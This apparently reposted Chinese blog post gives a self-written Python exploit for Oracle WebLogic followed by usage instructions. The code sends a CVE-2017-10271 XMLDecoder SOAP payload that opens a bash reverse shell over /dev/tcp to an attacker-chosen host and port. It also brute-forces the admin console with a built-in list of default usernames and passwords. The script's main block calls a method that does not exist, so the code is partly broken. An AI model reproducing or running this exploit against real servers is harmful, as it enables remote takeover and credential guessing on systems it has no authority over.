自己写的Weblogic的poc

其他 2019-07-04 11:58:12 阅读次数: 0 
"""
暂时只试用于Linux,先试试用一下反弹shell  CVE-2017-10271的EXp
"""
import requests
import sys
class Weblogic :
    def __init__(self,host,port,url) :
        self.url=url
        self.host=host
        self.port=port
    def CVE_2017_10271_Shell(self):
        url=self.url+"/wls-wsat/CoordinatorPortType"
        port=self.port
        host=self.host
        header={"Accept":"*/*","Accept-Language":"en","User-Agent":"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)","Content-Type":"text/xml","Connection":"close","Host":self.url.replace("http://","")}
        data="""
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/{}/{} 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>""".format(self.host,self.port)
        Mikasa=requests.post(url,headers=header,data=data)
        print("请查看有没有获得Shell!!")
    def Shell_Cmd(self) :
        pass
    def Weak_Password(self):
        password=['WebLogic', 'weblogic', 'Oracle@123', 'password', 'system', 'Administrator', 'admin', 'security', 'joe', 'wlcsystem', 'wlpisystem','mary']
        url=self.url+"/console/j_security_check"
        for user in password :
            for pwd in password :
                data={"j_username":user,"j_password":pwd,"j_character_encoding":"UTF-8"}
                test=requests.post(url,data=data,allow_redirects=False,verify=False)
                if 'console' in test.text and 'LoginForm.jsp' not in test.text :
                    print("存在弱口令!!!!")
                    print("user:"+user+"   password:"+pwd)
                    exit()
if __name__=='__main__' :
    exp=Weblogic(sys.argv[3],sys.argv[4],sys.argv[1])
    if sys.argv[2]=="CVE_2017_10271_Shell":
        exp.Reverse_Shell()
    elif sys.argv[2]=="Cmd":
        pass
    elif sys.argv[2]=="Weak_Password" :
        exp.Weak_Password()
    else :
        print("去屎吧2333333")
    print("CVE-2018-2628以及CVE-2018-2894也要去试试看,自己暂时还写不出这两个的exp")

 使用方法:

反弹shell :    python3  exp.py  http://xxxx:7001/   CVE_2017_10271_Shell     host   port(后面的是你自己压迫反弹Shell的主机ip以及端口)  

Weak密码检测:   python3 exp.py  http://xxxx:7001/    Weak_Password    xxx   xxx     (因为用的是类的构造函数整的,所以在进行其他方面的测试的时候会导致后面多一些东西,填任意的即可QAQ)

猜你喜欢

转载自www.cnblogs.com/Mikasa-Ackerman/p/11131419.html
POC
今日推荐
《美国对全球网络空间安全与发展的威胁和破坏》报告发布
火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱?
北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
周排行
让自己的头脑极度开放
CentOS 6.5(x64) 和Redhat6.5操作系误删libc
高可用注册中心
【日记】12.28/【题解】AtCoder AGC041
XML(5)_XML 约束_DTD
Java集合Map(四)
树梅派安装桌面环境教程
pipenv 的 使用和安装
小程序白屏问题和内存研究
C语言简单选择排序
每日归档
更多
2024-05-02(0)
2024-05-01(4)
2024-04-30(1)
2024-04-29(40)
2024-04-28(0)
2024-04-27(56)
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022